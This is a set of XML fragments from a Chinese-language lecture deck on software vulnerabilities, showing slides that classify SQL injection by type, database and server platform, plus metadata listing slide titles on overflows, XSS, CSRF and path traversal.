              <a:t>数字型注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符型注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索型注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>句语连接型注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013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从注入的数据库分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MS_SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DB2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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从注入的服务器分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>
  </p:transition>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
  <a:themeElements>
    <a:clrScheme name="1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1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1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1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1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1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1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1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1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1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12277</TotalTime>
  <Words>7794</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>895</Paragraphs>
  <Slides>142</Slides>
  <Notes>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142</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="151" baseType="lpstr">
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>演示文稿1</vt:lpstr>
      <vt:lpstr>1</vt:lpstr>
      <vt:lpstr>软件安全</vt:lpstr>
      <vt:lpstr>第2章 软件漏洞及风险分析</vt:lpstr>
      <vt:lpstr>软件漏洞的定义</vt:lpstr>
      <vt:lpstr>软件漏洞的分类</vt:lpstr>
      <vt:lpstr>软件漏洞概述</vt:lpstr>
      <vt:lpstr>利用软件漏洞攻击的实例 </vt:lpstr>
      <vt:lpstr>利用软件漏洞攻击的实例</vt:lpstr>
      <vt:lpstr>利用软件漏洞攻击的实例</vt:lpstr>
      <vt:lpstr>利用软件漏洞攻击的实例</vt:lpstr>
      <vt:lpstr>软件漏洞的特点</vt:lpstr>
      <vt:lpstr>软件漏洞防治的相对性</vt:lpstr>
      <vt:lpstr>漏洞相关标准</vt:lpstr>
      <vt:lpstr>CVE标准 </vt:lpstr>
      <vt:lpstr>CVE标准</vt:lpstr>
      <vt:lpstr>国内漏洞库</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>软件漏洞利用方式</vt:lpstr>
      <vt:lpstr>本地攻击模式</vt:lpstr>
      <vt:lpstr>远程主动攻击模式</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>远程被动攻击模式</vt:lpstr>
      <vt:lpstr>缓冲区溢出漏洞</vt:lpstr>
      <vt:lpstr>缓冲区溢出漏洞</vt:lpstr>
      <vt:lpstr>缓冲区溢出漏洞原理</vt:lpstr>
      <vt:lpstr>Windows的内存布局</vt:lpstr>
      <vt:lpstr>缓冲区与内存分布</vt:lpstr>
      <vt:lpstr>缓冲区与内存分布</vt:lpstr>
      <vt:lpstr>C语言中内存分配</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>C++语言中内存分配</vt:lpstr>
      <vt:lpstr>堆与栈</vt:lpstr>
      <vt:lpstr>堆与栈</vt:lpstr>
      <vt:lpstr>堆与栈</vt:lpstr>
      <vt:lpstr>堆与栈</vt:lpstr>
      <vt:lpstr>栈帧</vt:lpstr>
      <vt:lpstr>栈帧信息</vt:lpstr>
      <vt:lpstr>栈操作</vt:lpstr>
      <vt:lpstr>栈操作</vt:lpstr>
      <vt:lpstr>栈内容</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>函数调用过程</vt:lpstr>
      <vt:lpstr>函数调用中栈的工作过程</vt:lpstr>
      <vt:lpstr>栈溢出</vt:lpstr>
      <vt:lpstr>溢出实例</vt:lpstr>
      <vt:lpstr>例子</vt:lpstr>
      <vt:lpstr>函数调用中栈的工作过程</vt:lpstr>
      <vt:lpstr>函数调用中栈的工作过程</vt:lpstr>
      <vt:lpstr>栈溢出利用实例</vt:lpstr>
      <vt:lpstr>栈溢出的利用</vt:lpstr>
      <vt:lpstr>修改邻接变量</vt:lpstr>
      <vt:lpstr>栈溢出缺陷的程序例</vt:lpstr>
      <vt:lpstr>栈帧状态</vt:lpstr>
      <vt:lpstr>修改函数返回地址</vt:lpstr>
      <vt:lpstr>示例</vt:lpstr>
      <vt:lpstr>问题</vt:lpstr>
      <vt:lpstr>S.E.H结构覆盖</vt:lpstr>
      <vt:lpstr>S.E.H</vt:lpstr>
      <vt:lpstr>S.E.H链表结构</vt:lpstr>
      <vt:lpstr>S.E.H攻击原理</vt:lpstr>
      <vt:lpstr>堆溢出</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>堆的结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>堆块信息</vt:lpstr>
      <vt:lpstr>堆表</vt:lpstr>
      <vt:lpstr>空表数据结构</vt:lpstr>
      <vt:lpstr>堆表特点</vt:lpstr>
      <vt:lpstr>快表</vt:lpstr>
      <vt:lpstr>堆溢出的利用</vt:lpstr>
      <vt:lpstr>Dword Shoot</vt:lpstr>
      <vt:lpstr>堆溢出原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>例</vt:lpstr>
      <vt:lpstr>例</vt:lpstr>
      <vt:lpstr>DWORD SHOOT 常见攻击方式</vt:lpstr>
      <vt:lpstr>Heap Spray</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>攻击原理</vt:lpstr>
      <vt:lpstr>浏览器中的Heap Spray利用</vt:lpstr>
      <vt:lpstr>Heap Spray过程示意</vt:lpstr>
      <vt:lpstr>格式化串漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>格式化输出示例</vt:lpstr>
      <vt:lpstr>漏洞示意</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>可写入内存操作</vt:lpstr>
      <vt:lpstr>格式化串漏洞利用</vt:lpstr>
      <vt:lpstr>格式化漏洞例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Web应用程序漏洞</vt:lpstr>
      <vt:lpstr>注入漏洞</vt:lpstr>
      <vt:lpstr>SQL注入漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>SQL注入分类</vt:lpstr>
      <vt:lpstr>SQL注入分类</vt:lpstr>
      <vt:lpstr>SQL注入分类</vt:lpstr>
      <vt:lpstr>MySQL注入实例</vt:lpstr>
      <vt:lpstr>MySQL注入实例</vt:lpstr>
      <vt:lpstr>问题</vt:lpstr>
      <vt:lpstr>导致后果</vt:lpstr>
      <vt:lpstr>导致后果</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>注入漏洞的防范</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>跨站脚本（XSS）</vt:lpstr>
      <vt:lpstr>XSS的危害</vt:lpstr>
      <vt:lpstr>XSS分类</vt:lpstr>
      <vt:lpstr>反射型XSS漏洞</vt:lpstr>
      <vt:lpstr>例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>进一步攻击</vt:lpstr>
      <vt:lpstr>利用XSS进行cookie劫持</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>与钓鱼攻击的区别</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>保存型XSS漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基于DOM的XSS漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>DOM利用案例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>与其它XSS区别</vt:lpstr>
      <vt:lpstr>XSS的防范</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>跨站请求伪造（CSRF）</vt:lpstr>
      <vt:lpstr>利用案例</vt:lpstr>
      <vt:lpstr>与XSS区别</vt:lpstr>
      <vt:lpstr>其他Web漏洞</vt:lpstr>
      <vt:lpstr>PHP执行包含文件功能的函数</vt:lpstr>
      <vt:lpstr>利用案例</vt:lpstr>
      <vt:lpstr>上传漏洞</vt:lpstr>
      <vt:lpstr>路径遍历漏洞</vt:lpstr>
      <vt:lpstr>利用案例</vt:lpstr>
      <vt:lpstr>利用案例</vt:lpstr>
      <vt:lpstr>作业</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</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袁 昊男</cp:lastModifiedBy>
  <cp:revision>677</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-13T02:30:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-29T09:26:48Z</dcterms:modified>
</cp:coreProperties>
</file>